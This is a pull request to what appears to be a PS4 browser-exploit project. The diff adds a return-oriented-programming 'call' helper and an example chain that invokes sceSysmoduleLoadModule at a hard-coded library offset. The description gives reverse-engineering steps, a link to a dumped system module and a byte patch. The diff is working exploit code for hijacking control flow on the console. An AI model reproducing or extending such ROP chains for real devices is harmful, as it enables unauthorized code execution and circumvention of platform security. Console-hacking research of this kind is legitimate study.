### PR TITLE
added sceSysmoduleLoadModule example

### DIFF
--- a/ps4sploit.html
+++ b/ps4sploit.html
@@ -172,7 +172,10 @@
         debug_log("buffer addr = 0x" + rop_buf_addr.toString(16))
 
         debug_log("Starting ROP...")
-
+        
+        // to use later
+        var libSceSysmodule_base = undefined;
+        
         debug_log('Printing module information...')
         for (var i = 0; i < 0x100; i++) {
             var buf = storage.alloc(0x1A8)
@@ -191,9 +194,22 @@
             debug_log('Module Index: ' + i.toString(16))
             debug_log('Module Base: ' + base.toString(16))
             debug_log('===============')
+            
+           if(name == "libSceSysmodule.sprx") {
+                libSceSysmodule_base = base; // save to use later
+            }
+            
             storage.free(0x1A8 + 0x4)
         }
-
+        
+        // test loading libSceAvSetting.sprx, just like CTurt did
+        // sceSysmodule.sprx + 0x20A0 = sceSysmoduleLoadModule();
+        // int sceSysmoduleLoadModule(__int64 moduleID, __int64 a2, __int64 a3, _DWORD *a4)
+        r = new RopChain();
+        r.call(libSceSysmodule_base.add(0x20A0), 11, 0, 0, 0);
+        r.execute();
+        // you can now dump name again and see libSceAvSetting.sprx
+        
         r = new RopChain()
         var ret = storage.alloc(0x4)
         var mod_info = storage.alloc(0x40)

--- a/scripts/rop.js
+++ b/scripts/rop.js
@@ -113,7 +113,25 @@ function RopChain() {
         this.add(typeof(arg6) !== "undefined" ? arg6 : 0)
         this.add("syscall")
     }
-
+    
+    // credits to CTurt
+    this.call = function(address, arg1, arg2, arg3, arg4, arg5, arg6) {
+        this.add("pop rdi");
+        this.add(typeof(arg1) !== "undefined" ? arg1 : 0)
+        this.add("pop rsi");
+        this.add(typeof(arg2) !== "undefined" ? arg2 : 0)
+        this.add("pop rdx");
+        this.add(typeof(arg3) !== "undefined" ? arg3 : 0)
+        this.add("pop rcx");
+        this.add(typeof(arg4) !== "undefined" ? arg4 : 0)
+        this.add("pop r8");
+        this.add(typeof(arg5) !== "undefined" ? arg5 : 0)
+        this.add("pop r9");
+        this.add(typeof(arg6) !== "undefined" ? arg6 : 0)
+        
+        this.rop_chain.push(address.getLowBitsUnsigned());
+        this.rop_chain.push(address.getHighBitsUnsigned());
+    }
 
     this.execute = function() {
         var xchg = gadgets['xchg rax, rsp; dec dword ptr [rax - 0x77]'];


### PR DESCRIPTION
you can download my dump of libSceSysmodule.sprx:
load in ida and rebase image to address in file name!
https://www.mediafire.com/?esj2mmhp5k5b4bw
(Edit->Segments->Rebase program...)
https://i.gyazo.com/b9f182885baa980e7726ac4abe6fa600.png

paste of some modules found in libSceSysmodule.sprx:
http://pastebin.com/NG5UeAe7

sceSysmoduleLoadModule would be at 0x836D7A0A0
I set my compiler to AMD (\* something other text *), 64 bit mode
to decompile, make sure you are in 64 bit ida
then goto Options->Compiler (https://i.gyazo.com/a1f9490d456042aa4ee13c8b3d781b94.png)
Set the compiler to GNU C++ and pointer size to 64 bit
press f5, see if it works if not then goto 0x836D7A799 (example for sceSysmoduleLoadModule)
change the nop to a ret, 0x90 to 0xC3 in the hex view then keep changes
pics:
https://i.gyazo.com/6ac4757728bb6af698130af9cedc822a.png
https://i.gyazo.com/2642d83e726023e1df1e62ce4de77d0b.png
https://i.gyazo.com/95fefff36e7e9c8f05d8f1dc265b8599.png
https://i.gyazo.com/972991abf050826412f34d0b20bb592c.png
https://i.gyazo.com/606736e8a1e2c8570c4f56047468a496.png (will say this but will also decompile!)

https://i.gyazo.com/e00408e2af16d6b40723cafe81deb8c5.png

wonder if anyone will see this? lmfao
